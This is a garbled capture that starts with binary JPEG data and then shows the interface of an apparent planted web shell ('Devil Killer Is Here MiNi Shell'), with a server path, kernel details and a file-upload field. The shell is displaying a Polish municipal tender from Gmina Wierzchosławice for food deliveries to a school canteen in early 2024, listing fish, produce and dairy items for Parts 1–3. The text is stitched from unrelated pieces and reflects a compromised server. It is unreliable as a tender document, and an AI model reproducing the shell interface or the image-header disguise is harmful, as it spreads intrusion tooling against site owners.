JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231201/0052769201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa produktów spożywczych do stołówki szkolnej w I połowie 2024 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wierzchosławice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660996</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">-</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wierzchosławice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">146319030</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@wierzchoslawice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wierzchoslawice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa produktów spożywczych do stołówki szkolnej w I połowie 2024 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0415f1c5-8d24-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00527692</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00038035/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa produktów spożywczych do stołówki szkolnej w wyznaczonym okresie 2024 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0415f1c5-8d24-11ee-9fb5-3edbb70f45bd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/ oraz poczta elektroniczna (nie dotyczy składania ofert): zp@wierzchoslawice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/><br/>2. Wykonawca przygotowuje ofertę przy pomocy Formularza ofertowego udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”.<br/><br/>3. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>4. Do oferty należy dołączyć Oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu oraz Formularze cenowe, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę.<br/><br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza), z tym że maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/><br/>6. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/><br/>7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności dalej &#34;KRI&#34;, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki (pliki z danymi mogą również zostać skompresowane za pomocą programu do kompresji plików, jednakże Zamawiający musi mieć możliwość rozpakowania plików za pomocą programów określonych ww. Rozporządzeniu).<br/><br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: a) w formatach danych określonych w ppkt 7 (i przekazuje się jako załącznik) , lub b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/><br/>9. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail: zp@wierzchoslawice.pl. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być<br/>opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/><br/>10. Dokumenty zamówienia będą dostępne również pod adresem (po wybraniu odpowiedniego postępowania): https://bip.malopolska.pl/ugwierzchoslawice,m,418139,2023.html.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje znajdują się w pkt I.10 Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje znajdują się w pkt I.10 Specyfikacji Warunków Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IRD.271.1.15.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa ryb i mrożonek do stołówki szkolnej Szkoły Podstawowej im. 100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Filet z MAKRELI w sosie pomidorowym	szt.	100<br/>2. Łosoś mrożony	kg	60<br/>3. Miruna - filet mrożony	kg	600<br/>4. Paluszki rybne z fileta kg	240<br/>5. Brokuł mrożony	kg	180<br/>6. Brukselka mrożona	kg	60<br/>7. Bukiet kwiatowy jarzyn mrożony	kg	50<br/>8. Dynia mrożona	kg	80<br/>9. Fasola szparagowa zielona mrożona	kg	80<br/>10. Fasola szparagowa żółta mrożona	kg	150<br/>11. Groszek mrożony	kg	150<br/>12. Jagoda leśna mrożona	kg	60<br/>13. Kalafior mrożony	kg	150<br/>14. Malina mrożona	kg	100<br/>15. Marchew z groszkiem mrożona	kg	45<br/>16. Mieszanka kompotowa mrożona	kg	850<br/>17. Mini marchewka mrożona	kg	60<br/>18. Szpinak rozdrobniony mrożony	kg	30<br/>19. Śliwka węgierka bez pestek mrożona	kg	50<br/>20. Truskawka mrożona	kg	180<br/>21. Wiśnia drylowana mrożona	kg	90<br/>22. Włoszczyzna mrożona	kg	180<br/>23. Zupa jarzynowa mrożona	kg	45<br/><br/>Gotowość realizacji dostaw: w zależności od potrzeby (w dni robocze) w godz. 7.00 ÷ 10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15240000-2 - Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone</p> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15332100-5 - Przetworzone owoce</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznawane za ww. kryteria będą liczone następująco:<br/>a)	cena oferty brutto - 60% - max do 60 pkt.<br/> Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/> gdzie:<br/> - Cmin - najniższa cena spośród wszystkich ofert<br/> - Cof - cena podana w ofercie<br/> - waga procentowa dla kryterium „cena oferty brutto = 60%<br/><br/>b)	czas rozpatrzenia reklamacji - 40% - max do 40 pkt. <br/>Czas rozpatrzenia reklamacji przedmiotu umowy posiadającego wady i wymiany go na wolny od wad. Zgłoszenia dotyczące reklamacji dokonywane będą drogą telefoniczną, a następnie potwierdzane e-mailem. W czas rozpatrzenia reklamacji nie wlicza się sobót i dni ustawowo wolnych od pracy. Czas rozpatrzenia reklamacji nie może być dłuższy niż 72 godziny. Opis przyznawania punktów zawiera tabela:<br/>Lp.	Czas rozpatrzenia reklamacji	pkt<br/>1.	do 2 godzin	40<br/>2.	do 6 godzin	30<br/>3.	do 24 godzin	20<br/>4.	do 48 godzin	10<br/>5.	powyżej 48 godzin	0<br/><br/>Po dokonaniu oceny punkty zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa owoców i warzyw do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Arbuz	kg	300<br/>2. Awokado	szt.	50<br/>3. Banan	kg	800<br/>4. Borówka amerykańska	kg	15<br/>5. Brzoskwinia	kg	50<br/>6. Cytryna	kg	60<br/>7. Granat	szt.	40<br/>8. Gruszka	kg	500<br/>9. Jabłka	kg	1800<br/>10. Jabłko szara reneta	kg	200<br/>11. Kiwi	szt.	1000<br/>12. Mandarynka	kg	160<br/>13. Morela	kg	30<br/>14. Pomarańcza	kg	500<br/>15. Truskawka	kg	100<br/>16. Winogrona	kg	40<br/>17. Brokuły	szt.	30<br/>18. Burak młody z botwiną	szt.	60<br/>19. Buraki czerwone	kg	130<br/>20. Cebula	kg	300<br/>21. Cebula czerwona	kg	20<br/>22. Cebula młoda ze szczypiorkiem	szt.	30<br/>23. Cieciorka	kg	15<br/>24. Cukinia	kg	100<br/>25. Czosnek	szt.	220<br/>26. Fasola sucha &#34;Piękny Jaś&#34;	kg	100<br/>27. Kalafior	szt.	100<br/>28. Kalarepa	szt.	120<br/>29. Kapusta biała	kg	150<br/>30. Kapusta biała młoda	szt.	70<br/>31. Kapusta kiszona biała	kg	250<br/>32. Kapusta pekińska	szt.	200<br/>33. Kapusta włoska	szt.	80<br/>34. Kiełki rzodkiewki	szt.	20<br/>35. Koperek zielony	szt.	900<br/>36. Lubczyk świeży	szt.	350<br/>37. Marchew młoda szt.	100<br/>38. Marchewka	kg	1000<br/>39. Ogórek kiszony	kg	250<br/>40. Ogórek świeży	kg	350<br/>41. Papryka czerwona	kg	100<br/>42. Papryka zielona	kg	15<br/>43. Papryka żółta	kg	35<br/>44. Pieczarki świeże	kg	200<br/>45. Pietruszka korzeń	kg	450<br/>46. Pietruszka młoda z nacią	szt.	50<br/>47. Pietruszka natka	szt.	700<br/>48. Pomidory koktajlowe różne odmiany kg	70<br/>49. Pomidory różne odmiany	kg	200<br/>50. Pory	szt.	400<br/>51. Rzodkiewka	szt.	170<br/>52. Sałata zielona (różne odmiany)	szt.	250<br/>53. Seler korzeniowy kg	400<br/>54. Seler młody z liśćmi	szt.	70<br/>55. Seler naciowy	szt.	70<br/>56. Soczewica czerwona i zielona	kg 50<br/>57. Susz z buraka czerwonego	szt.	250<br/>58. Szczypiorek	szt.	350<br/>59. Ziemniaki	kg 6000<br/>60. Zioła świeże	szt.	50<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 7.00÷10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03222000-3 - Owoce i orzechy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03221000-6 - Warzywa</p> <p class="mb-0">15331000-7 - Warzywa przetworzone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznawane za ww. kryteria będą liczone następująco:<br/>a)	cena oferty brutto - 60% - max do 60 pkt.<br/> Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/> gdzie:<br/> - Cmin - najniższa cena spośród wszystkich ofert<br/> - Cof - cena podana w ofercie<br/> - waga procentowa dla kryterium „cena oferty brutto = 60%<br/><br/>b)	czas rozpatrzenia reklamacji - 40% - max do 40 pkt. <br/>Czas rozpatrzenia reklamacji przedmiotu umowy posiadającego wady i wymiany go na wolny od wad. Zgłoszenia dotyczące reklamacji dokonywane będą drogą telefoniczną, a następnie potwierdzane e-mailem. W czas rozpatrzenia reklamacji nie wlicza się sobót i dni ustawowo wolnych od pracy. Czas rozpatrzenia reklamacji nie może być dłuższy niż 72 godziny. Opis przyznawania punktów zawiera tabela:<br/>Lp.	Czas rozpatrzenia reklamacji	pkt<br/>1.	do 2 godzin	40<br/>2.	do 6 godzin	30<br/>3.	do 24 godzin	20<br/>4.	do 48 godzin	10<br/>5.	powyżej 48 godzin	0<br/><br/>Po dokonaniu oceny punkty zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa artykułów mleczarskich do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Jogurt grecki 9% 400g	szt.	50<br/>2. Jogurt naturalny 1kg wiaderko	szt.	150<br/>3. Jogurt naturalny 2% 400g	szt.	170<br/>4. Jogurt naturalny bez laktozy	szt.	100<br/>5. Jogurt naturalny wiadro 5kg	szt.	90<br/>6. Jogurt owocowy 150g (z laktozą i bez laktozy)	szt.	1500<br/>7. Jogurt pitny 150-250g	szt.	350<br/>8. Kefir 1l	szt.	200<br/>9. Kefir 200g	szt.	220<br/>10. Masło	szt.	1300<br/>11. Mleko bez laktozy szt.	120<br/>12. Mleko fermentowane owocowe	szt.	1300<br/>13. Mleko UHT 2%	szt.	3500<br/>14. Parmezan 200g	szt.	200<br/>15. Ser Edamski	kg	45<br/>16. Ser Feta	szt.	40<br/>17. Ser Gouda	kg	60<br/>18. Ser Gouda wiórki	kg	30<br/>19. Ser Mozzarella wiórki	kg	25<br/>20. Ser na sernik wiaderko szt.	400<br/>21. Ser topiony	szt.	100<br/>22. Serek homogenizowany 140g	szt.	850<br/>23. Serek maskarpone	szt.	170<br/>24. Serek mozzarella kulka	szt.	50<br/>25. Śmietana 18% szt.	1500<br/>26. Śmietana 30%	l	150<br/>27. Śmietana 36%	l	80<br/>28. Twaróg półtłusty kg	180<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 7.00÷10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. 